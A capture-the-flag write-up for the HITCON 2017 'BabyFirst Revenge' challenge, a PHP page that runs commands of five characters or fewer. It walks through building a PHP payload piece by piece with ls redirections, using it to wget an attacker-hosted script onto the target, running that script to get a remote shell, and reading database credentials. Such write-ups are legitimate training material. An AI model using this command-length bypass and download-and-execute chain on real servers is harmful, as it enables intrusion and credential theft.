# BabyFirst-Revenge-HITCOIN-2017-QUALS

When we visite site, we see
#### Source Code:
```
<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__); 
```
Here we can execute commands on server, which are <=5.  There is an easy way how to solve this task with the help of \ symbol, but i choose the stupid one :D 
The main idea is to write a php script, which will execute shell command  
``` wget myserverip ```  
, and then run it with  
``` sh index.html ( sh i*) ```  
  
  We will use ```ls``` command to write php code in file. But the main difficulty is that ```ls>>a``` will first make file ```a```, and then prints it with other files. So i decided to name my file as ```%0d```. Our task is to produce this code  
``` <?php $a="abcdefghijklmnopqrstuvwxyz0123456789 ";$b=$a;$b[0]=$a[23];$b[1]=$a[7];.....;exec($b); ```  
  
 But we must take into account that we can write only 4 characters per time (>abcd); First we must create file %0d, we request ```http://52.199.204.34/?cmd=>%0d```. Secondly we cant create ```<?php``` , but luckily ```<?=``` will also work. So we run  
 ```
 >\<?=
 ls>>%0d
 rm *=
 ```  
 Ater each file create and file writing, we must delete it in order not to write it again into %0d file. Then we continue create/write our 'gadgets'.  
 ``` 
 >\$a
 ls>>%0d
 rm *a
 
 >=\"
 ls>>%0d
 rm =*
 
 etc.
 ```
 All request we can make with help of burpintruder with timeout between requests 1 second. After sending all requests we run
```
 php ?
```
index.html will be downloaded on target server. Than we run  
```
. i*
```
and get remote shell. In the home directory was login/password for MySql database where flag was stored. Than we simply extract data from it and get the flag.